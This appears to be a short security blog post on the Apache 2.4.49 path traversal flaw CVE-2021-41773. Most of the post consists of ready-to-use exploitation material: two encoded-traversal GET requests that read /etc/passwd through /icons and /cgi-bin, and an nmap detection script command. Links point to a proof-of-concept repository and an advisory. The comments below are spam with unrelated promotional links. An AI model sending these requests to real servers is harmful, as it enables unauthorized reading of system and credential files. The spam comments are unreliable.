Apache-/2.4.49-CVE-2021-41773: Path Traversal Vulnerability

Apache-/2.4.49-CVE-2021-41773: Path Traversal Vulnerability

Below are the detals for exploitation of this vulnerability:

  • GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
  • GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  • nmap  script at https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse
  • nmap script=http-vuln-cve-2021-41773.nse <target>

Proof of Concept:


Reference:

  • https://github.com/blasty/CVE-2021-41773
  • https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited

Comments

  1. Hey friend, it is very well written article, thank you for the valuable and useful information you provide in this post. Keep up the good work! FYI, please check these depression, stress and anxiety related articles:
    The Power Of Habit book pdf download
    , How to apply for bajaj finserv card No cost EMI Card ,

    ReplyDelete
  2. This article provides a concise and practical overview of the Apache 2.4.49 CVE-2021-41773 path traversal vulnerability, clearly illustrating the exploitation process and highlighting the security risks associated with improper path normalization. The inclusion of proof-of-concept examples and relevant references makes it a valuable resource for security professionals, researchers, and system administrators seeking to understand, assess, and mitigate this critical vulnerability. Excellent work presenting complex technical information in an accessible and informative manner.
    ambulance non emergency number
    builders clean services in Melbourne
    Energy Industry Training

    ReplyDelete

Post a Comment

Popular posts from this blog

Polaris’ Intellect Core Banking Software Version 9.7.1- Open Redirect [CVE-2018-14931]

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Error Based SQL Injection Vulnerability in Polaris’ Intellect Core Banking Software Version 9.7.1 [CVE-2018-14874]